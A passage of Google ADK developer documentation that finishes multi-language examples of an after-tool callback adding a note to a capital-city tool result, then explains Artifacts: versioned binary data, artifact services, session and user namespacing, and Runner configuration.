  if (toolName === "get_capital_city" && originalResultValue === "Washington, D.C.") {
    const modifiedResponse = JSON.parse(JSON.stringify(response));
    modifiedResponse.result = `${originalResultValue} (Note: This is the capital of the USA).`;
    modifiedResponse["note_added_by_callback"] = true;

    console.log(
      `[Callback] Modified response: ${JSON.stringify(modifiedResponse)}`
    );
    return modifiedResponse;
  }

  console.log('[Callback] Passing original tool response through.');
  return undefined;
}

// Create LlmAgent and Assign Callback
const myLlmAgent = new LlmAgent({
  name: "AfterToolCallbackAgent",
  model: MODEL_NAME,
  instruction: "You are an agent that finds capital cities using the get_capital_city tool. Report the result clearly.",
  description: "An LLM agent demonstrating after_tool_callback",
  tools: [capitalTool],
  afterToolCallback: simpleAfterToolModifier,
});

// Agent Interaction Logic
async function callAgentAndPrint(
  runner: InMemoryRunner,
  agent: LlmAgent,
  sessionId: string,
  query: string,
) {
  console.log(`\n>>> Calling Agent: '${agent.name}' | Query: ${query}`);

  let finalResponseContent = "";
  for await (const event of runner.runAsync({
    userId: USER_ID,
    sessionId: sessionId,
    newMessage: createUserContent(query),
  })) {
    const authorName = event.author || "System";
    if (isFinalResponse(event) && event.content?.parts?.length) {
      // Collect the text the agent actually returned instead of a fixed string
      finalResponseContent = event.content.parts
        .map((part) => part.text ?? "")
        .join("");
      console.log(`--- Output from: ${authorName} ---`);
    } else if (event.errorMessage) {
      console.log(` -> Error from ${authorName}: ${event.errorMessage}`);
    }
  }
  console.log(`<<< Agent '${agent.name}' Response: ${finalResponseContent}`);
}

// Run Interactions
async function main() {
  const runner = new InMemoryRunner({ appName: APP_NAME, agent: myLlmAgent });

  await runner.sessionService.createSession({
    appName: APP_NAME,
    userId: USER_ID,
    sessionId: SESSION_ID,
  });

  await callAgentAndPrint(runner, myLlmAgent, SESSION_ID, "united states");
}

main();
```

```go
package main

import (
	"context"
	"fmt"
	"log"
	"regexp"
	"strings"

	"google.golang.org/adk/agent"
	"google.golang.org/adk/agent/llmagent"
	"google.golang.org/adk/model"
	"google.golang.org/adk/model/gemini"
	"google.golang.org/adk/runner"
	"google.golang.org/adk/session"
	"google.golang.org/adk/tool"
	"google.golang.org/adk/tool/functiontool"
	"google.golang.org/genai"
)

// GetCapitalCityArgs defines the arguments for the getCapitalCity tool.
type GetCapitalCityArgs struct {
	Country string `json:"country" jsonschema:"The country to get the capital of."`
}

// getCapitalCity is a tool that returns the capital of a given country.
func getCapitalCity(ctx tool.Context, args *GetCapitalCityArgs) (string, error) {
	capitals := map[string]string{
		"canada":        "Ottawa",
		"france":        "Paris",
		"germany":       "Berlin",
		"united states": "Washington, D.C.",
	}
	capital, ok := capitals[strings.ToLower(args.Country)]
	if !ok {
		return "", fmt.Errorf("unknown country: %s", args.Country)
	}
	return capital, nil
}

func onAfterTool(ctx tool.Context, t tool.Tool, args map[string]any, result map[string]any, err error) (map[string]any, error) {
	log.Printf("[Callback] AfterTool triggered for tool %q in agent %q.", t.Name(), ctx.AgentName())
	log.Printf("[Callback] Original result: %v", result)

	if err != nil {
		log.Printf("[Callback] Tool run produced an error: %v. Passing through.", err)
		return nil, err
	}

	if t.Name() == "getCapitalCity" {
		if originalResult, ok := result["result"].(string); ok && originalResult == "Washington, D.C." {
			log.Println("[Callback] Detected 'Washington, D.C.'. Modifying tool response.")
			// Copy the result into a new map rather than mutating the original.
			modifiedResult := make(map[string]any)
			for k, v := range result {
				modifiedResult[k] = v
			}
			modifiedResult["result"] = fmt.Sprintf("%s (Note: This is the capital of the USA).", originalResult)
			modifiedResult["note_added_by_callback"] = true
			return modifiedResult, nil
		}
	}

	log.Println("[Callback] Passing original tool response through.")
	return nil, nil
}

// Note: modelName, appName, and runScenario are not defined in this snippet;
// they come from elsewhere in the example file.
func runAfterToolExample() {
	ctx := context.Background()
	geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{})
	if err != nil {
		log.Fatalf("FATAL: Failed to create model: %v", err)
	}
	capitalTool, err := functiontool.New(functiontool.Config{
		Name:        "getCapitalCity",
		Description: "Retrieves the capital city of a given country.",
	}, getCapitalCity)
	if err != nil {
		log.Fatalf("FATAL: Failed to create function tool: %v", err)
	}

	llmCfg := llmagent.Config{
		Name:               "AgentWithAfterToolCallback",
		Model:              geminiModel,
		Tools:              []tool.Tool{capitalTool},
		AfterToolCallbacks: []llmagent.AfterToolCallback{onAfterTool},
		Instruction:        "You are an agent that finds capital cities. Use the getCapitalCity tool.",
	}
	testAgent, err := llmagent.New(llmCfg)
	if err != nil {
		log.Fatalf("FATAL: Failed to create agent: %v", err)
	}

	sessionService := session.InMemoryService()
	r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService})
	if err != nil {
		log.Fatalf("FATAL: Failed to create runner: %v", err)
	}

	log.Println("--- SCENARIO 1: Result should be modified ---")
	runScenario(ctx, r, sessionService, appName, "session_tool_after_modify", nil, "capital of united states")
}
```

```java
import com.google.adk.agents.LlmAgent;
import com.google.adk.agents.InvocationContext;
import com.google.adk.events.Event;
import com.google.adk.runner.InMemoryRunner;
import com.google.adk.sessions.Session;
import com.google.adk.tools.Annotations.Schema;
import com.google.adk.tools.BaseTool;
import com.google.adk.tools.FunctionTool;
import com.google.adk.tools.ToolContext;
import com.google.common.collect.ImmutableMap;
import com.google.genai.types.Content;
import com.google.genai.types.Part;
import io.reactivex.rxjava3.core.Flowable;
import io.reactivex.rxjava3.core.Maybe;
import java.util.HashMap;
import java.util.Map;

public class AfterToolCallbackExample {

  private static final String APP_NAME = "AfterToolCallbackAgentApp";
  private static final String USER_ID = "user_1";
  private static final String SESSION_ID = "session_001";
  private static final String MODEL_NAME = "gemini-2.0-flash";

  public static void main(String[] args) {
    AfterToolCallbackExample example = new AfterToolCallbackExample();
    example.runAgent("What is the capital of the United States?");
  }

  // --- Define a Simple Tool Function (Same as before) ---
  @Schema(description = "Retrieves the capital city of a given country.")
  public static Map<String, Object> getCapitalCity(
      @Schema(description = "The country to find the capital of.") String country) {
    System.out.printf("--- Tool 'getCapitalCity' executing with country: %s ---%n", country);
    Map<String, String> countryCapitals = new HashMap<>();
    countryCapitals.put("united states", "Washington, D.C.");
    countryCapitals.put("canada", "Ottawa");
    countryCapitals.put("france", "Paris");
    countryCapitals.put("germany", "Berlin");

    String capital =
        countryCapitals.getOrDefault(country.toLowerCase(), "Capital not found for " + country);
    return ImmutableMap.of("result", capital);
  }

  // Define the Callback function.
  public Maybe<Map<String, Object>> simpleAfterToolModifier(
      InvocationContext invocationContext,
      BaseTool tool,
      Map<String, Object> args,
      ToolContext toolContext,
      Object toolResponse) {
    // Inspects/modifies the tool result after execution.
    String agentName = invocationContext.agent().name();
    String toolName = tool.name();
    System.out.printf(
        "[Callback] After tool call for tool '%s' in agent '%s'%n", toolName, agentName);
    System.out.printf("[Callback] Args used: %s%n", args);
    System.out.printf("[Callback] Original tool_response: %s%n", toolResponse);

    if (!(toolResponse instanceof Map)) {
      System.out.println("[Callback] toolResponse is not a Map, cannot process further.");
      // Pass through if not a map
      return Maybe.empty();
    }

    // Default structure for function tool results is {"result": <return_value>}
    @SuppressWarnings("unchecked")
    Map<String, Object> responseMap = (Map<String, Object>) toolResponse;
    Object originalResultValue = responseMap.get("result");

    // --- Modification Example ---
    // If the tool was 'getCapitalCity' and result is 'Washington, D.C.'
    if ("getCapitalCity".equals(toolName) && "Washington, D.C.".equals(originalResultValue)) {
      System.out.println("[Callback] Detected 'Washington, D.C.'. Modifying tool response.");

      // IMPORTANT: Create a new mutable map or modify a copy
      Map<String, Object> modifiedResponse = new HashMap<>(responseMap);
      modifiedResponse.put(
          "result", originalResultValue + " (Note: This is the capital of the USA).");
      modifiedResponse.put("note_added_by_callback", true); // Add extra info if needed

      System.out.printf("[Callback] Modified tool_response: %s%n", modifiedResponse);
      return Maybe.just(modifiedResponse);
    }

    System.out.println("[Callback] Passing original tool response through.");
    // Return Maybe.empty() to use the original tool_response
    return Maybe.empty();
  }

  public void runAgent(String query) {
    // --- Wrap the function into a Tool ---
    FunctionTool capitalTool = FunctionTool.create(this.getClass(), "getCapitalCity");

    // Create LlmAgent and Assign Callback
    LlmAgent myLlmAgent =
        LlmAgent.builder()
            .name(APP_NAME)
            .model(MODEL_NAME)
            .instruction(
                "You are an agent that finds capital cities using the getCapitalCity tool. Report"
                    + " the result clearly.")
            .description("An LLM agent demonstrating after_tool_callback")
            .tools(capitalTool) // Add the tool
            .afterToolCallback(this::simpleAfterToolModifier) // Assign the callback
            .build();

    InMemoryRunner runner = new InMemoryRunner(myLlmAgent);

    // Session and Runner
    Session session =
        runner.sessionService().createSession(APP_NAME, USER_ID, null, SESSION_ID).blockingGet();

    Content userMessage = Content.fromParts(Part.fromText(query));

    System.out.printf("%n--- Calling agent with query: \"%s\" ---%n", query);
    Flowable<Event> eventStream = runner.runAsync(USER_ID, session.id(), userMessage);
    // Stream event response
    eventStream.blockingForEach(
        event -> {
          if (event.finalResponse()) {
            System.out.println(event.stringifyContent());
          }
        });
  }
}
```

# Artifacts

Supported in ADK: Python v0.1.0, TypeScript v0.2.0, Go v0.1.0, Java v0.1.0

In ADK, **Artifacts** are the mechanism for managing named, versioned binary data associated either with a specific user interaction session or persistently with a user across
multiple sessions. They allow your agents and tools to handle data beyond simple text strings, enabling richer interactions involving files, images, audio, and other binary formats.

**Note:** The specific parameters or method names for the primitives may vary slightly by SDK language (e.g., `save_artifact` in Python, `saveArtifact` in Java). Refer to the language-specific API documentation for details.

## What are Artifacts?

- **Definition:** An Artifact is essentially a piece of binary data (like the content of a file) identified by a unique `filename` string within a specific scope (session or user). Each time you save an artifact with the same filename, a new version is created.
- **Representation:** Artifacts are consistently represented using the standard `google.genai.types.Part` object. The core data is typically stored within an inline data structure of the `Part` (accessed via `inline_data`), which itself contains:
    - `data`: The raw binary content as bytes.
    - `mime_type`: A string indicating the type of the data (e.g., `"image/png"`, `"application/pdf"`). This is essential for correctly interpreting the data later.

```py
# Example of how an artifact might be represented as a types.Part
import google.genai.types as types

# Assume 'image_bytes' contains the binary data of a PNG image
image_bytes = b'\x89PNG\r\n\x1a\n...'
# Placeholder for actual image bytes

image_artifact = types.Part(
    inline_data=types.Blob(
        mime_type="image/png",
        data=image_bytes
    )
)

# You can also use the convenience constructor:
# image_artifact_alt = types.Part.from_bytes(data=image_bytes, mime_type="image/png")

print(f"Artifact MIME Type: {image_artifact.inline_data.mime_type}")
print(f"Artifact Data (first 10 bytes): {image_artifact.inline_data.data[:10]}...")
```

```typescript
import type { Part } from '@google/genai';
import { createPartFromBase64 } from '@google/genai';

// Assume 'imageBytes' contains the binary data of a PNG image
const imageBytes = new Uint8Array([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a]); // Placeholder

// Uint8Array.toString() ignores an encoding argument, so encode via Buffer (Node.js).
const imageArtifact: Part = createPartFromBase64(Buffer.from(imageBytes).toString('base64'), "image/png");

console.log(`Artifact MIME Type: ${imageArtifact.inlineData?.mimeType}`);
// Note: Accessing raw bytes would require decoding from base64.
```

```go
import (
	"log"
	"os"

	"google.golang.org/genai"
)

// Create a byte slice with the image data.
imageBytes, err := os.ReadFile("image.png")
if err != nil {
	log.Fatalf("Failed to read image file: %v", err)
}

// Create a new artifact with the image data.
imageArtifact := &genai.Part{
	InlineData: &genai.Blob{
		MIMEType: "image/png",
		Data:     imageBytes,
	},
}
log.Printf("Artifact MIME Type: %s", imageArtifact.InlineData.MIMEType)
log.Printf("Artifact Data (first 8 bytes): %x...", imageArtifact.InlineData.Data[:8])
```

```java
import com.google.genai.types.Part;
import java.nio.charset.StandardCharsets;

public class ArtifactExample {
  public static void main(String[] args) {
    // Assume 'imageBytes' contains the binary data of a PNG image
    byte[] imageBytes = {(byte) 0x89, (byte) 0x50, (byte) 0x4E, (byte) 0x47, (byte) 0x0D,
        (byte) 0x0A, (byte) 0x1A, (byte) 0x0A, (byte) 0x01, (byte) 0x02}; // Placeholder for actual image bytes

    // Create an image artifact using Part.fromBytes
    Part imageArtifact = Part.fromBytes(imageBytes, "image/png");

    System.out.println("Artifact MIME Type: " + imageArtifact.inlineData().get().mimeType().get());
    System.out.println(
        "Artifact Data (first 10 bytes): "
            + new String(imageArtifact.inlineData().get().data().get(), 0, 10, StandardCharsets.UTF_8)
            + "...");
  }
}
```

- **Persistence & Management:** Artifacts are not stored directly within the agent or session state. Their storage and retrieval are managed by a dedicated **Artifact Service** (an implementation of `BaseArtifactService`, defined in `google.adk.artifacts`). ADK provides various implementations, such as:
    - An in-memory service for testing or temporary storage (e.g., `InMemoryArtifactService` in Python, defined in `google.adk.artifacts.in_memory_artifact_service.py`).
    - A service for persistent storage using Google Cloud Storage (GCS) (e.g., `GcsArtifactService` in Python, defined in `google.adk.artifacts.gcs_artifact_service.py`).

    The chosen service implementation handles versioning automatically when you save data.

## Why Use Artifacts?
While session `state` is suitable for storing small pieces of configuration or conversational context (like strings, numbers, booleans, or small dictionaries/lists), Artifacts are designed for scenarios involving binary or large data:

1. **Handling Non-Textual Data:** Easily store and retrieve images, audio clips, video snippets, PDFs, spreadsheets, or any other file format relevant to your agent's function.
1. **Persisting Large Data:** Session state is generally not optimized for storing large amounts of data. Artifacts provide a dedicated mechanism for persisting larger blobs without cluttering the session state.
1. **User File Management:** Provide capabilities for users to upload files (which can be saved as artifacts) and retrieve or download files generated by the agent (loaded from artifacts).
1. **Sharing Outputs:** Enable tools or agents to generate binary outputs (like a PDF report or a generated image) that can be saved via `save_artifact` and later accessed by other parts of the application or even in subsequent sessions (if using user namespacing).
1. **Caching Binary Data:** Store the results of computationally expensive operations that produce binary data (e.g., rendering a complex chart image) as artifacts to avoid regenerating them on subsequent requests.

In essence, whenever your agent needs to work with file-like binary data that needs to be persisted, versioned, or shared, Artifacts managed by an `ArtifactService` are the appropriate mechanism within ADK.

## Common Use Cases

Artifacts provide a flexible way to handle binary data within your ADK applications. Here are some typical scenarios where they prove valuable:

- **Generated Reports/Files:**
    - A tool or agent generates a report (e.g., a PDF analysis, a CSV data export, an image chart).
- **Handling User Uploads:**
    - A user uploads a file (e.g., an image for analysis, a document for summarization) through a front-end interface.
- **Storing Intermediate Binary Results:**
    - An agent performs a complex multi-step process where one step generates intermediate binary data (e.g., audio synthesis, simulation results).
- **Persistent User Data:**
    - Storing user-specific configuration or data that isn't a simple key-value state.
- **Caching Generated Binary Content:**
    - An agent frequently generates the same binary output based on certain inputs (e.g., a company logo image, a standard audio greeting).

## Core Concepts

Understanding artifacts involves grasping a few key components: the service that manages them, the data structure used to hold them, and how they are identified and versioned.

### Artifact Service (`BaseArtifactService`)

- **Role:** The central component responsible for the actual storage and retrieval logic for artifacts. It defines *how* and *where* artifacts are persisted.
- **Interface:** Defined by the abstract base class `BaseArtifactService`. Any concrete implementation must provide methods for:
    - `Save Artifact`: Stores the artifact data and returns its assigned version number.
    - `Load Artifact`: Retrieves a specific version (or the latest) of an artifact.
    - `List Artifact keys`: Lists the unique filenames of artifacts within a given scope.
    - `Delete Artifact`: Removes an artifact (and potentially all its versions, depending on implementation).
    - `List versions`: Lists all available version numbers for a specific artifact filename.
- **Configuration:** You provide an instance of an artifact service (e.g., `InMemoryArtifactService`, `GcsArtifactService`) when initializing the `Runner`. The `Runner` then makes this service available to agents and tools via the `InvocationContext`.
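To make the five operations in the interface above concrete, here is a minimal, self-contained sketch of a versioned in-memory store. It is an illustration only: `ToyArtifactStore`, its method names, and its key layout are hypothetical and are not ADK's `InMemoryArtifactService`. It assumes versions start at 0 and that a `"user:"` filename prefix drops the session from the storage key, as this page describes.

```python
from collections import defaultdict
from typing import Optional


class ToyArtifactStore:
    """Hypothetical in-memory store; NOT ADK's InMemoryArtifactService."""

    def __init__(self) -> None:
        # Each key maps to a list of payloads; the list index is the version.
        self._versions: dict[tuple, list[bytes]] = defaultdict(list)

    @staticmethod
    def _key(app_name: str, user_id: str, session_id: str, filename: str) -> tuple:
        # Assumption: "user:" filenames ignore the session, so every session
        # of the same user resolves to the same key.
        if filename.startswith("user:"):
            return (app_name, user_id, None, filename)
        return (app_name, user_id, session_id, filename)

    def save(self, app_name, user_id, session_id, filename, data: bytes) -> int:
        versions = self._versions[self._key(app_name, user_id, session_id, filename)]
        versions.append(data)
        return len(versions) - 1  # version assigned to this save

    def load(self, app_name, user_id, session_id, filename,
             version: Optional[int] = None) -> Optional[bytes]:
        versions = self._versions.get(
            self._key(app_name, user_id, session_id, filename), [])
        if not versions:
            return None
        if version is None:
            return versions[-1]  # latest version
        return versions[version] if 0 <= version < len(versions) else None

    def list_keys(self, app_name, user_id, session_id) -> list[str]:
        # Filenames visible from this session: its own plus user-scoped ones.
        return sorted(
            key[3] for key, versions in self._versions.items()
            if versions and key[:2] == (app_name, user_id)
            and key[2] in (None, session_id)
        )

    def list_versions(self, app_name, user_id, session_id, filename) -> list[int]:
        key = self._key(app_name, user_id, session_id, filename)
        return list(range(len(self._versions.get(key, []))))

    def delete(self, app_name, user_id, session_id, filename) -> None:
        # This sketch removes every version of the artifact.
        self._versions.pop(self._key(app_name, user_id, session_id, filename), None)


store = ToyArtifactStore()
store.save("app", "u1", "s1", "report.pdf", b"first")
store.save("app", "u1", "s1", "report.pdf", b"second")
store.save("app", "u1", "s1", "user:settings.json", b"{}")

print(store.load("app", "u1", "s1", "report.pdf"))          # b'second'
print(store.load("app", "u1", "s2", "report.pdf"))          # None
print(store.load("app", "u1", "s2", "user:settings.json"))  # b'{}'
```

A real service would store `Part` objects rather than raw bytes and would persist them somewhere durable. The configuration examples that follow show how an actual service instance is passed to the `Runner`.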
```py from google.adk.runners import Runner from google.adk.artifacts import InMemoryArtifactService # Or GcsArtifactService from google.adk.agents import LlmAgent # Any agent from google.adk.sessions import InMemorySessionService # Example: Configuring the Runner with an Artifact Service my_agent = LlmAgent(name="artifact_user_agent", model="gemini-2.0-flash") artifact_service = InMemoryArtifactService() # Choose an implementation session_service = InMemorySessionService() runner = Runner( agent=my_agent, app_name="my_artifact_app", session_service=session_service, artifact_service=artifact_service # Provide the service instance here ) # Now, contexts within runs managed by this runner can use artifact methods ``` ```typescript import { InMemoryRunner } from '@google/adk'; import { LlmAgent } from '@google/adk'; import { InMemoryArtifactService } from '@google/adk'; import { InMemorySessionService } from '@google/adk'; // Example: Configuring the Runner with an Artifact Service const myAgent = new LlmAgent({name: "artifact_user_agent", model: "gemini-2.5-flash"}); const artifactService = new InMemoryArtifactService(); // Choose an implementation const sessionService = new InMemorySessionService(); const runner = new InMemoryRunner({ agent: myAgent, appName: "my_artifact_app", sessionService: sessionService, artifactService: artifactService, // Provide the service instance here }); // Now, contexts within runs managed by this runner can use artifact methods ``` ```go import ( "context" "log" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/artifactservice" "google.golang.org/adk/llm/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/sessionservice" "google.golang.org/genai" ) // Create a new context. ctx := context.Background() // Set the app name. const appName = "my_artifact_app" // Create a new Gemini model. 
model, err := gemini.NewModel(ctx, "gemini-2.5-flash", &genai.ClientConfig{}) if err != nil { log.Fatalf("Failed to create model: %v", err) } // Create a new LLM agent. myAgent, err := llmagent.New(llmagent.Config{ Model: model, Name: "artifact_user_agent", Instruction: "You are an agent that describes images.", BeforeModelCallbacks: []llmagent.BeforeModelCallback{ BeforeModelCallback, }, }) if err != nil { log.Fatalf("Failed to create agent: %v", err) } // Create a new in-memory artifact service. artifactService := artifact.InMemoryService() // Create a new in-memory session service. sessionService := session.InMemoryService() // Create a new runner. r, err := runner.New(runner.Config{ Agent: myAgent, AppName: appName, SessionService: sessionService, ArtifactService: artifactService, // Provide the service instance here }) if err != nil { log.Fatalf("Failed to create runner: %v", err) } log.Printf("Runner created successfully: %v", r) ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.runner.Runner; import com.google.adk.sessions.InMemorySessionService; import com.google.adk.artifacts.InMemoryArtifactService; // Example: Configuring the Runner with an Artifact Service LlmAgent myAgent = LlmAgent.builder() .name("artifact_user_agent") .model("gemini-2.0-flash") .build(); InMemoryArtifactService artifactService = new InMemoryArtifactService(); // Choose an implementation InMemorySessionService sessionService = new InMemorySessionService(); Runner runner = new Runner(myAgent, "my_artifact_app", artifactService, sessionService); // Provide the service instance here // Now, contexts within runs managed by this runner can use artifact methods ``` ### Artifact Data - **Standard Representation:** Artifact content is universally represented using the `google.genai.types.Part` object, the same structure used for parts of LLM messages. 
- **Key Attribute (`inline_data`):** For artifacts, the most relevant attribute is `inline_data`, which is a `google.genai.types.Blob` object containing: - `data` (`bytes`): The raw binary content of the artifact. - `mime_type` (`str`): A standard MIME type string (e.g., `'application/pdf'`, `'image/png'`, `'audio/mpeg'`) describing the nature of the binary data. **This is crucial for correct interpretation when loading the artifact.** ```python import google.genai.types as types # Example: Creating an artifact Part from raw bytes pdf_bytes = b'%PDF-1.4...' # Your raw PDF data pdf_mime_type = "application/pdf" # Using the constructor pdf_artifact_py = types.Part( inline_data=types.Blob(data=pdf_bytes, mime_type=pdf_mime_type) ) # Using the convenience class method (equivalent) pdf_artifact_alt_py = types.Part.from_bytes(data=pdf_bytes, mime_type=pdf_mime_type) print(f"Created Python artifact with MIME type: {pdf_artifact_py.inline_data.mime_type}") ``` ```typescript import type { Part } from '@google/genai'; import { createPartFromBase64 } from '@google/genai'; // Example: Creating an artifact Part from raw bytes const pdfBytes = new Uint8Array([0x25, 0x50, 0x44, 0x46, 0x2d, 0x31, 0x2e, 0x34]); // Your raw PDF data const pdfMimeType = "application/pdf"; const pdfArtifact: Part = createPartFromBase64(pdfBytes.toString('base64'), pdfMimeType); console.log(`Created TypeScript artifact with MIME Type: ${pdfArtifact.inlineData?.mimeType}`); ``` ```go import ( "log" "os" "google.golang.org/genai" ) // Load imageBytes from a file imageBytes, err := os.ReadFile("image.png") if err != nil { log.Fatalf("Failed to read image file: %v", err) } // genai.NewPartFromBytes is a convenience function that is a shorthand for // creating a &genai.Part with the InlineData field populated. // Create a new artifact from the image data. 
imageArtifact := genai.NewPartFromBytes(imageBytes, "image/png")
log.Printf("Artifact MIME Type: %s", imageArtifact.InlineData.MIMEType)
```

```java
import com.google.genai.types.Blob;
import com.google.genai.types.Part;
import java.nio.charset.StandardCharsets;

public class ArtifactDataExample {
  public static void main(String[] args) {
    // Example: Creating an artifact Part from raw bytes
    byte[] pdfBytes = "%PDF-1.4...".getBytes(StandardCharsets.UTF_8); // Your raw PDF data
    String pdfMimeType = "application/pdf";

    // Using Part.builder() with an explicitly built Blob
    Blob pdfBlob = Blob.builder()
        .data(pdfBytes)
        .mimeType(pdfMimeType)
        .build();
    Part pdfArtifactJava = Part.builder().inlineData(pdfBlob).build();

    // Using the convenience static method Part.fromBytes() (equivalent)
    Part pdfArtifactAltJava = Part.fromBytes(pdfBytes, pdfMimeType);

    // Accessing mimeType, note the use of Optional
    String mimeType = pdfArtifactJava.inlineData()
        .flatMap(Blob::mimeType)
        .orElse("unknown");
    System.out.println("Created Java artifact with MIME type: " + mimeType);

    // Accessing data
    byte[] data = pdfArtifactJava.inlineData()
        .flatMap(Blob::data)
        .orElse(new byte[0]);
    System.out.println("Java artifact data (first 10 bytes): "
        + new String(data, 0, Math.min(data.length, 10), StandardCharsets.UTF_8) + "...");
  }
}
```

### Filename

- **Identifier:** A simple string used to name and retrieve an artifact within its specific namespace.
- **Uniqueness:** Filenames must be unique within their scope (either the session or the user namespace).
- **Best Practice:** Use descriptive names, potentially including file extensions (e.g., `"monthly_report.pdf"`, `"user_avatar.jpg"`). The extension itself doesn't dictate behavior; the `mime_type` does.

### Versioning

- **Automatic Versioning:** The artifact service automatically handles versioning.
When you call `save_artifact`, the service determines the next available version number (typically starting from 0 and incrementing) for that specific filename and scope. - **Returned by `save_artifact`:** The `save_artifact` method returns the integer version number that was assigned to the newly saved artifact. - **Retrieval:** - `load_artifact(..., version=None)` (default): Retrieves the *latest* available version of the artifact. - `load_artifact(..., version=N)`: Retrieves the specific version `N`. - **Listing Versions:** The `list_versions` method (on the service, not context) can be used to find all existing version numbers for an artifact. ### Namespacing (Session vs. User) - **Concept:** Artifacts can be scoped either to a specific session or more broadly to a user across all their sessions within the application. This scoping is determined by the `filename` format and handled internally by the `ArtifactService`. - **Default (Session Scope):** If you use a plain filename like `"report.pdf"`, the artifact is associated with the specific `app_name`, `user_id`, *and* `session_id`. It's only accessible within that exact session context. - **User Scope (`"user:"` prefix):** If you prefix the filename with `"user:"`, like `"user:profile.png"`, the artifact is associated only with the `app_name` and `user_id`. It can be accessed or updated from *any* session belonging to that user within the app. ```python # Example illustrating namespace difference (conceptual) # Session-specific artifact filename session_report_filename = "summary.txt" # User-specific artifact filename user_config_filename = "user:settings.json" # When saving 'summary.txt' via context.save_artifact, # it's tied to the current app_name, user_id, and session_id. # When saving 'user:settings.json' via context.save_artifact, # the ArtifactService implementation should recognize the "user:" prefix # and scope it to app_name and user_id, making it accessible across sessions for that user. 
``` ```typescript // Example illustrating namespace difference (conceptual) // Session-specific artifact filename const sessionReportFilename = "summary.txt"; // User-specific artifact filename const userConfigFilename = "user:settings.json"; // When saving 'summary.txt' via context.saveArtifact, it's tied to the current appName, userId, and sessionId. // When saving 'user:settings.json' via context.saveArtifact, the ArtifactService implementation recognizes the "user:" prefix and scopes it to appName and userId, making it accessible across sessions for that user. ``` ```go import ( "log" ) // Note: Namespacing is only supported when using the GCS ArtifactService implementation. // A session-scoped artifact is only available within the current session. sessionReportFilename := "summary.txt" // A user-scoped artifact is available across all sessions for the current user. userConfigFilename := "user:settings.json" // When saving 'summary.txt' via ctx.Artifacts().Save, // it's tied to the current app_name, user_id, and session_id. // ctx.Artifacts().Save(sessionReportFilename, *artifact); // When saving 'user:settings.json' via ctx.Artifacts().Save, // the ArtifactService implementation should recognize the "user:" prefix // and scope it to app_name and user_id, making it accessible across sessions for that user. // ctx.Artifacts().Save(userConfigFilename, *artifact); ``` ```java // Example illustrating namespace difference (conceptual) // Session-specific artifact filename String sessionReportFilename = "summary.txt"; // User-specific artifact filename String userConfigFilename = "user:settings.json"; // The "user:" prefix is key // When saving 'summary.txt' via context.save_artifact, // it's tied to the current app_name, user_id, and session_id. 
// artifactService.saveArtifact(appName, userId, sessionId1, sessionReportFilename, someData);

// When saving 'user:settings.json' via context.saveArtifact,
// the ArtifactService implementation should recognize the "user:" prefix
// and scope it to app_name and user_id, making it accessible across sessions for that user.
// artifactService.saveArtifact(appName, userId, sessionId1, userConfigFilename, someData);
```

These core concepts work together to provide a flexible system for managing binary data within the ADK framework.

## Interacting with Artifacts (via Context Objects)

The primary way you interact with artifacts within your agent's logic (specifically within callbacks or tools) is through methods provided by the `CallbackContext` and `ToolContext` objects. These methods abstract away the underlying storage details managed by the `ArtifactService`.

### Prerequisite: Configuring the `ArtifactService`

Before you can use any artifact methods via the context objects, you **must** provide an instance of a [`BaseArtifactService` implementation](#available-implementations) (like [`InMemoryArtifactService`](#inmemoryartifactservice) or [`GcsArtifactService`](#gcsartifactservice)) when initializing your `Runner`.

In Python, pass the instance as the `artifact_service` argument of the `Runner`.
```python from google.adk.runners import Runner from google.adk.artifacts import InMemoryArtifactService # Or GcsArtifactService from google.adk.agents import LlmAgent from google.adk.sessions import InMemorySessionService # Your agent definition agent = LlmAgent(name="my_agent", model="gemini-2.0-flash") # Instantiate the desired artifact service artifact_service = InMemoryArtifactService() # Provide it to the Runner runner = Runner( agent=agent, app_name="artifact_app", session_service=InMemorySessionService(), artifact_service=artifact_service # Service must be provided here ) ``` If no `artifact_service` is configured in the `InvocationContext` (which happens if it's not passed to the `Runner`), calling `save_artifact`, `load_artifact`, or `list_artifacts` on the context objects will raise a `ValueError`. ```typescript import { LlmAgent, InMemoryRunner, InMemoryArtifactService, InMemorySessionService } from '@google/adk'; // Your agent definition const agent = new LlmAgent({name: "my_agent", model: "gemini-2.5-flash"}); // Instantiate the desired artifact service const artifactService = new InMemoryArtifactService(); // Provide it to the Runner const runner = new InMemoryRunner({ agent: agent, appName: "artifact_app", sessionService: new InMemorySessionService(), artifactService: artifactService, // Service must be provided here }); // If no artifactService is configured, calling artifact methods on context objects will throw an error. ``` In Java, if an `ArtifactService` instance is not available (e.g., `null`) when artifact operations are attempted, it would typically result in a `NullPointerException` or a custom error, depending on how your application is structured. Robust applications often use dependency injection frameworks to manage service lifecycles and ensure availability. 
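The failure mode described above for Python (a `ValueError` when no artifact service was passed to the `Runner`) can be handled defensively. The following is a minimal sketch using a hypothetical stand-in, `ToyContext`, rather than ADK's real `CallbackContext`; the error message and the dict-backed "service" are assumptions made so the example runs on its own.

```python
from typing import Optional


class ToyContext:
    """Hypothetical stand-in for a callback/tool context; not an ADK class."""

    def __init__(self, artifact_service: Optional[dict] = None) -> None:
        # A plain dict plays the role of the artifact service in this sketch.
        self._artifact_service = artifact_service

    def save_artifact(self, filename: str, data: bytes) -> int:
        # Mirrors the documented behavior: no service configured -> ValueError.
        if self._artifact_service is None:
            raise ValueError("Artifact service is not initialized.")
        versions = self._artifact_service.setdefault(filename, [])
        versions.append(data)
        return len(versions) - 1


def try_save(context: ToyContext, filename: str, data: bytes) -> Optional[int]:
    """Returns the saved version, or None when no service is configured."""
    try:
        return context.save_artifact(filename, data)
    except ValueError as exc:
        print(f"Skipping artifact save: {exc}")
        return None


print(try_save(ToyContext(), "notes.txt", b"hello"))                     # None
print(try_save(ToyContext(artifact_service={}), "notes.txt", b"hello"))  # 0
```

Catching the error close to the call keeps a misconfigured `Runner` from aborting the whole callback, at the cost of silently skipping the save; whether that trade-off is acceptable depends on how essential the artifact is to the agent's task.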
